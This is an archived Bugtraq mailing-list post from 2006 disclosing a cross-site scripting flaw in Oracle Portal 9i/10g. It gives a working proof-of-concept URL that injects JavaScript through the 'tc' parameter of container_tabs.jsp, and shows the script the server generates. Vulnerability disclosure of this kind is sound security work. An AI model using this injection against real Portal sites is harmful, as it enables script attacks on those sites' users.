bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

Oracle Applications/Portal 9i/10g Cross Site Scripting

from [putosoft softputo] [Permanent Link][Original]
To: bugtraq@securityfocus.com, full-disclosure@lists.grok.org.uk
Subject: Oracle Applications/Portal 9i/10g Cross Site Scripting
From: "putosoft softputo" <hasecorp@hotmail.com>
Date: Fri, 22 Dec 2006 08:30:42 +0000
Delivered-to: sp-com-lists@consult.net
Delivered-to: bugtraq-list@securepoint.com
Delivered-to: mailing list bugtraq@securityfocus.com
Delivered-to: moderator for bugtraq@securityfocus.com
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@securityfocus.com; run by ezmlm 
Description
---------------
There are plenty (hundreds) of Cross Site Scripting vulnerabilities in the Oracle Portal. The following is one that you may found in any version: 

http://<target>/webapp/jsp/container_tabs.jsp?tc=null%20=%20null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now',%20'null');//

The following code will be generated:

---SNIPPED---
<script language=javascript>
top.null = null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now', 'null');//.render(window); 
</script>
---SNIPPED---

Solution
------------
There is no solution. As a workaround, enable mod_security if it's not. Otherwise wait 6 months/1 year for a patch from Oracle Corp. 

_________________________________________________________________
Dale rienda suelta a tu tiempo libre. Mil ideas para exprimir tu ocio con MSN Entretenimiento. http://entretenimiento.msn.es/
[More with this subject...]
<Prev in Thread] Current Thread [Next in Thread>
  • Oracle Applications/Portal 9i/10g Cross Site Scripting, putosoft softputo <=
Previous by Date:  rPSA-2006-0234-1 firefox, rPath Update Announcements
Next by Date:  Re[2]: critical Flaw in Firefox 2.0.0.1 allows to steal the user passwords with a videoclip, Thierry Zoller
Previous by Thread:  rPSA-2006-0234-1 firefox, rPath Update Announcements
Next by Thread:  TSLSA-2006-0074 - multi, Trustix Security Advisor
Indexes:  [Date] [Thread] [Top] [All Lists]